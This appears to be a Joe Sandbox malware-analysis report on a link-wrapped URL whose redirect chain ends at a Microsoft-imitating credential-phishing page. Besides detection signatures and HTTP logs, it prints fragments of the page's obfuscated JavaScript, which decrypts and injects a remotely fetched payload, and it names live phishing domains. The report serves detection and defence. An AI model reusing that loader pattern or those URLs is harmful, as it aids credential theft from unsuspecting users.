Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://us-west-2.protection.sophos.com/?d=sendibm3.com&u=aHR0cHM6Ly9lOWRqNy5yLmFnLmQuc2VuZGlibTMuY29tL21rL2NsL2Yvc2gvT3ljWnZIdUZvMWVRc25iY0tMWktJREVHL2NnVmNyV21hWFhrZg==&i=NThlN2NjYzYyOTljZjkxNGY4YmM0YmNh&t=VnQ2OXdVTk5pNGo3ZVpJdGxqM3hWU01RTFNlTTR3MVJQYzE0U1QzTnJSWT0=&h=3051c7643cbf456abcee4da5b8589

Overview

General Information

Sample URL:https://us-west-2.protection.sophos.com/?d=sendibm3.com&u=aHR0cHM6Ly9lOWRqNy5yLmFnLmQuc2VuZGlibTMuY29tL21rL2NsL2Yvc2gvT3ljWnZIdUZvMWVRc25iY0tMWktJREVHL2NnVmNyV21hWFhrZg==&i=NThlN2NjYzYyOTljZjkxNGY4YmM
Analysis ID:1495725
Infos:

Detection

HTMLPhisher
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Suricata IDS alerts for network traffic
Yara detected HtmlPhish70
AI detected landing page
HTML page contains hidden URLs
HTML page contains suspicious javascript code
Phishing site detected (based on logo match)
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)
Detected suspicious crossdomain redirect
HTML body contains low number of good links
HTML body with high number of embedded images detected
HTML page contains hidden javascript code
HTML title does not match URL
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 6192 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://us-west-2.protection.sophos.com/?d=sendibm3.com&u=aHR0cHM6Ly9lOWRqNy5yLmFnLmQuc2VuZGlibTMuY29tL21rL2NsL2Yvc2gvT3ljWnZIdUZvMWVRc25iY0tMWktJREVHL2NnVmNyV21hWFhrZg==&i=NThlN2NjYzYyOTljZjkxNGY4YmM0YmNh&t=VnQ2OXdVTk5pNGo3ZVpJdGxqM3hWU01RTFNlTTR3MVJQYzE0U1QzTnJSWT0=&h=3051c7643cbf456abcee4da5b8589e9f&s=AVNPUEhUT0NFTkNSWVBUSVZ8AqEkCzalfWzVtfa3JPWpqexIqdRxhnkmNvFrX5FCFHbzmUEDyREh-sSR_GxUDZUFP4_iKFiHHCQrvBd4vpKuC2uTI8TlTsM5VBshiKK92DyKYTjtekCdl7a_yoDRBqg MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 5912 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1968,i,4422493508800080892,16665077100818751429,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
dropped/chromecache_74JoeSecurity_HtmlPhish_70Yara detected HtmlPhish_70Joe Security
    SourceRuleDescriptionAuthorStrings
    4.4.pages.csvJoeSecurity_HtmlPhish_70Yara detected HtmlPhish_70Joe Security
      4.6.pages.csvJoeSecurity_HtmlPhish_70Yara detected HtmlPhish_70Joe Security
        No Sigma rule has matched
        Timestamp:2024-08-20T15:40:52.839731+0200
        SID:2022112
        Severity:1
        Source Port:49715
        Destination Port:443
        Protocol:TCP
        Classtype:Exploit Kit Activity Detected

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: https://us-west-2.protection.sophos.com/?d=sendibm3.com&u=aHR0cHM6Ly9lOWRqNy5yLmFnLmQuc2VuZGlibTMuY29tL21rL2NsL2Yvc2gvT3ljWnZIdUZvMWVRc25iY0tMWktJREVHL2NnVmNyV21hWFhrZg==&i=NThlN2NjYzYyOTljZjkxNGY4YmM0YmNh&t=VnQ2OXdVTk5pNGo3ZVpJdGxqM3hWU01RTFNlTTR3MVJQYzE0U1QzTnJSWT0=&h=3051c7643cbf456abcee4da5b8589e9f&s=AVNPUEhUT0NFTkNSWVBUSVZ8AqEkCzalfWzVtfa3JPWpqexIqdRxhnkmNvFrX5FCFHbzmUEDyREh-sSR_GxUDZUFP4_iKFiHHCQrvBd4vpKuC2uTI8TlTsM5VBshiKK92DyKYTjtekCdl7a_yoDRBqgSlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering
        Source: https://riseandgain.com/favicon.icoAvira URL Cloud: Label: phishing
        Source: https://riseandgain.com/,Avira URL Cloud: Label: phishing

        Phishing

        barindex
        Source: https://riseandgain.com/LLM: Score: 10 Reasons: The domain 'riseandgain.com' does not match the identified brand 'Microsoft', and the domain appears to be unrelated to Microsoft's official domains. The webpage's design and content are simple and clean, but the presence of a login form and the use of the Microsoft brand name are indicators of a phishing attempt. Users should be cautious and not enter their login information on this site, as it is likely a phishing site trying to trick users into providing their login credentials. DOM: 4.7.pages.csv
        Source: Yara matchFile source: 4.4.pages.csv, type: HTML
        Source: Yara matchFile source: 4.6.pages.csv, type: HTML
        Source: Yara matchFile source: dropped/chromecache_74, type: DROPPED
        Source: https://riseandgain.com/HTTP Parser: https://bestcomps.com.ru///7555.php
        Source: https://riseandgain.com/HTTP Parser: window.location.href = atob(
        Source: https://riseandgain.com/Matcher: Template: microsoft matched
        Source: https://riseandgain.com/HTTP Parser: async function laborious(nagging) { <!-- driving is a conversation between you and the road. --> var {a,b,c,d} = json.parse(nagging); return cryptojs.aes.decrypt(a, cryptojs.pbkdf2(cryptojs.enc.hex.parse(d), cryptojs.enc.hex.parse(b), {hasher: cryptojs.algo.sha512, keysize: 64/8, iterations: 999}), {iv: cryptojs.enc.hex.parse(c)}).tostring(cryptojs.enc.utf8); } async function zonal() {yearly.hidden = 0;cabby.hidden = 1; document.write(await laborious(await (await fetch(await laborious(atob(`eyjhijoieut5wdjxrtnftfh4bg1rzthraktyenbhd0fnsznhmznoynfgvdlfcfwvmzg9iiwiyyi6imy0nwi1ntuwogu1m2qyyzhiowvlntaxyjq3zjhknda1iiwiyii6ije3yznjyzawzjc4mzi3zju3yjbmngm2mjrjmwjjztlmodywzdm5mwe1ntizntvjmmmzmwi2oddhmjhjytzjmza2ngqzndnizguzmwriztu3odawyja0ngfmzty3mwy4zddimwe2nzkxngy2n2i2otnmzmi5ytfinduwmzc5n2zmmzixytgzytfjm2eyzgu0yzu2nzjmzgrhmzdhotzkzjniy2fmote5yzvmngi5mdmzotu0otuxmjuzzmuymmrhzdfkyzhhodkxogu5mtdmzjy0odu5zjfjzgqxmjyxzdbiotkynjnlztc5ogi2mdnjmzniotbmogzlzthjm2fimte0m2e3y2q0ogu3y...
        Source: https://riseandgain.com/HTTP Parser: Number of links: 0
        Source: https://riseandgain.com/HTTP Parser: Total embedded image size: 45708
        Source: https://riseandgain.com/HTTP Parser: Base64 decoded: {"a":"yKyX2qE3ELXxlmQe8QjKrzpawAMK3G33hbqFT9Ep\/38=","c":"f45b55508e53d2c8b9ee501b47f8d405","b":"17c3cc00f78327f57b0f4c624c1bce9f860d391a552355c2c31b687a28ca6c3064d343bde31dbe57800b044afe671f8d7b1a67914f67b693ffb9a1b4503797ff321a83a1c3a2de4c5672fdda37a96d...
        Source: https://riseandgain.com/HTTP Parser: Title: fainthearted does not match URL
        Source: https://willpeltz.com/HTTP Parser: No favicon
        Source: https://willpeltz.com/HTTP Parser: No favicon
        Source: https://willpeltz.com/5069167943.phpHTTP Parser: No favicon
        Source: https://riseandgain.com/HTTP Parser: No favicon
        Source: https://riseandgain.com/HTTP Parser: No favicon
        Source: https://riseandgain.com/HTTP Parser: No favicon
        Source: https://riseandgain.com/HTTP Parser: No <meta name="author".. found
        Source: https://riseandgain.com/HTTP Parser: No <meta name="copyright".. found
        Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49721 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49722 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 40.127.240.158:443 -> 192.168.2.16:49723 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.16:49724 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 20.190.159.2:443 -> 192.168.2.16:49725 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 40.127.240.158:443 -> 192.168.2.16:49726 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 40.127.240.158:443 -> 192.168.2.16:49728 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 40.127.240.158:443 -> 192.168.2.16:49730 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 40.127.240.158:443 -> 192.168.2.16:49732 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 40.127.240.158:443 -> 192.168.2.16:49733 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.16:49734 version: TLS 1.2

        Networking

        barindex
        Source: Network trafficSuricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.16:49715 -> 104.18.7.69:443
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: us-west-2.protection.sophos.com to https://e9dj7.r.ag.d.sendibm3.com/mk/cl/f/sh/oyczvhufo1eqsnbcklzkideg/cgvcrwmaxxkf
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: career4vets.com to https://riseandgain.com
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
        Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
        Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
        Source: unknownTCP traffic detected without corresponding DNS query: 40.127.240.158
        Source: unknownTCP traffic detected without corresponding DNS query: 40.127.240.158
        Source: unknownTCP traffic detected without corresponding DNS query: 40.127.240.158
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
        Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
        Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
        Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
        Source: unknownTCP traffic detected without corresponding DNS query: 40.127.240.158
        Source: unknownTCP traffic detected without corresponding DNS query: 40.127.240.158
        Source: unknownTCP traffic detected without corresponding DNS query: 40.127.240.158
        Source: unknownTCP traffic detected without corresponding DNS query: 40.127.240.158
        Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.2
        Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.2
        Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.2
        Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
        Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
        Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
        Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
        Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.2
        Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.2
        Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.2
        Source: global trafficHTTP traffic detected: GET /?d=sendibm3.com&u=aHR0cHM6Ly9lOWRqNy5yLmFnLmQuc2VuZGlibTMuY29tL21rL2NsL2Yvc2gvT3ljWnZIdUZvMWVRc25iY0tMWktJREVHL2NnVmNyV21hWFhrZg==&i=NThlN2NjYzYyOTljZjkxNGY4YmM0YmNh&t=VnQ2OXdVTk5pNGo3ZVpJdGxqM3hWU01RTFNlTTR3MVJQYzE0U1QzTnJSWT0=&h=3051c7643cbf456abcee4da5b8589e9f&s=AVNPUEhUT0NFTkNSWVBUSVZ8AqEkCzalfWzVtfa3JPWpqexIqdRxhnkmNvFrX5FCFHbzmUEDyREh-sSR_GxUDZUFP4_iKFiHHCQrvBd4vpKuC2uTI8TlTsM5VBshiKK92DyKYTjtekCdl7a_yoDRBqg HTTP/1.1Host: us-west-2.protection.sophos.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /mk/cl/f/sh/OycZvHuFo1eQsnbcKLZKIDEG/cgVcrWmaXXkf HTTP/1.1Host: e9dj7.r.ag.d.sendibm3.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /cm.html?id=8031197 HTTP/1.1Host: sibautomation.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://e9dj7.r.ag.d.sendibm3.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /cm?uuid=109bd09f-8162-4c15-979d-9737cee25901&client_id=8031197&trans=0&user_id=1 HTTP/1.1Host: in-automate.brevo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://sibautomation.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://sibautomation.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: willpeltz.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://e9dj7.r.ag.d.sendibm3.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: willpeltz.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
        Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=sr5KOmdYZKCn+Vv&MD=WGz5RGkc HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
        Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=sr5KOmdYZKCn+Vv&MD=WGz5RGkc HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
        Source: global trafficHTTP traffic detected: GET /new/rocky.php HTTP/1.1Host: career4vets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://willpeltz.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: riseandgain.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://willpeltz.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://riseandgain.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://riseandgain.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/6790c32b9fc9/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://riseandgain.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/6790c32b9fc9/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/xbh34/0x4AAAAAAAhidKplJ_I6A90O/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://riseandgain.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8b62cdd32d9718b1&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/xbh34/0x4AAAAAAAhidKplJ_I6A90O/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/xbh34/0x4AAAAAAAhidKplJ_I6A90O/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8b62cdd32d9718b1&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: riseandgain.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://riseandgain.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1617668413:1724159622:eUR_OoHan022D1jqK4hTlRSv3-8-mo2Kr9Sxb8iUsXo/8b62cdd32d9718b1/2245aa7fb0a0c67 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
